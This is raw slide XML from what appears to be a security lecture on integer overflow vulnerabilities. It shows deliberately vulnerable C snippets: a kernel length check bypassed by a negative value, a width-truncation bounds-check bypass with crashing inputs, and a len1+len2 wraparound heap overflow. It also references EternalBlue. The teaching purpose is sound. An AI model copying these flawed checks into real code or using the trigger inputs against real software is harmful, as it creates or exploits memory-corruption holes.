                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     …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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = MIN(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sa_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>copyout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>caddr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>uap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>asa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>u_int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    …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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21515" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72DF7DA-0755-2746-8E34-4B2152480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7587" y="3068994"/>
            <a:ext cx="34916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Checks that “len” is not too big</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21516" name="Straight Arrow Connector 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05E25FA-E6A1-BF49-B28E-0A41720CC935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="21515" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2852736" y="3269049"/>
            <a:ext cx="1974851" cy="352396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19" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F629BAC-1410-854F-A5E3-F48DCB7D9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7587" y="3449994"/>
            <a:ext cx="47051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+mn-lt"/>
              </a:rPr>
              <a:t>Negative “len” will always pass this check…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21520" name="TextBox 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DCBD504-8CA3-6040-A953-E10741813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1412" y="4390590"/>
            <a:ext cx="27334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+mn-lt"/>
              </a:rPr>
              <a:t>… interpreted as a huge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+mn-lt"/>
              </a:rPr>
              <a:t>unsigned integer here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21521" name="Straight Arrow Connector 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA3C2F22-2671-1C4A-B7D4-3D7372D5BFD3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5534023" y="4441390"/>
            <a:ext cx="687388" cy="228600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22" name="TextBox 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55842147-6198-2F49-9AEA-CAF96739A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0744" y="5149276"/>
            <a:ext cx="358143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… will copy up to 4G of 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    kernel memory to user space</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28343434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5" grpId="0"/>
      <p:bldP spid="21519" grpId="0"/>
      <p:bldP spid="21520" grpId="0"/>
      <p:bldP spid="215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7400" y="885823"/>
            <a:ext cx="3695700" cy="2677656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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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int main(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    unsigned short s;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    int 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latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[80];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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> &lt; 3){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083969" y="1120577"/>
            <a:ext cx="4050631" cy="3323987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   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atoi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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   s = 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latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;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if(s &gt;= 80) { /* [w1] */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 err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("Oh no you don't!\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    }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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("s = %d\n", s);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memcpy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buf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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[2], 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latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[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latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>] = '\0’;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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("%s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p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    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Elbow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4785816" y="240011"/>
            <a:ext cx="2442903" cy="4204034"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -9358"/>
              <a:gd name="adj2" fmla="val 47889"/>
              <a:gd name="adj3" fmla="val 10935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038350" y="3921797"/>
            <a:ext cx="3524250" cy="1815882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 err="1"/>
              <a:t>nova:signed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> {100} ./width1 5 hello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> s = 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> hello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nova:signed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> {101} ./width1 80 hello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Oh no you don't!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nova:signed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> {102} ./width1 65536 hello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> s = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37058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675" y="1862138"/>
            <a:ext cx="7239000" cy="2587752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void  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>( char *buf1, *buf2,    unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> len1, len2) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>	char temp[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>	if  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>(len1 + len2 &gt; 256)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>   {return -1}	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>// length check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>(temp,  buf1,  len1);	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>// cat buffers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface=" "/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>(temp+len1,  buf2,  len2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="5029200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>	do-something(temp); 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface=" "/>
              </a:rPr>
              <a:t>// do stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface=" 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11913" y="4853045"/>
            <a:ext cx="4740400" cy="1150700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7E79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What if   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>len1 = 0x80,    len2 = 0xffffff80   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>?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        ⇒   len1+len2 = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Second  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>() will overflow heap !!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86A520-0370-AB47-AC5F-D7F464402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Integer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259456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95857925"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1171574" y="2014194"/>
          <a:ext cx="6329363" cy="4201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210B3D2-B6C8-AF4A-B985-ABAAAB87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Overflow Exploit Stats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2999235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316D455-D6D2-4945-A672-273CA85FC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307" y="2014194"/>
            <a:ext cx="8567058" cy="1576759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10B3D2-B6C8-AF4A-B985-ABAAAB87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Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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EF19627-0C31-2941-A817-89112A703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87" y="3478770"/>
            <a:ext cx="4839037" cy="198120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BF90F1F9-5C8A-5B45-ACCC-6183E95AD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77" y="3478770"/>
            <a:ext cx="4713323" cy="1576759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EDB7B9-2CCF-E344-B48D-730901E0820D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4600575" y="6046129"/>
            <a:ext cx="71794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risksense.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/wp-content/uploads/2018/05/White-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Paper_Eternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>Blue.pdf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674740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AF893C8-9E59-464A-B402-6B29E258A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86" y="1368240"/>
            <a:ext cx="5880101" cy="1897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0BDDC4-C233-1345-ADD7-F02987C424CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6922935" y="1555380"/>
            <a:ext cx="3428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Remember the emergency Apple update on September 13, 2021?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12BA66-339F-0E4C-97DA-179013153FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="6076950"/>
            <a:ext cx="5844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techcrunch.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/2021/09/13/apple-zero-day-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>nso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
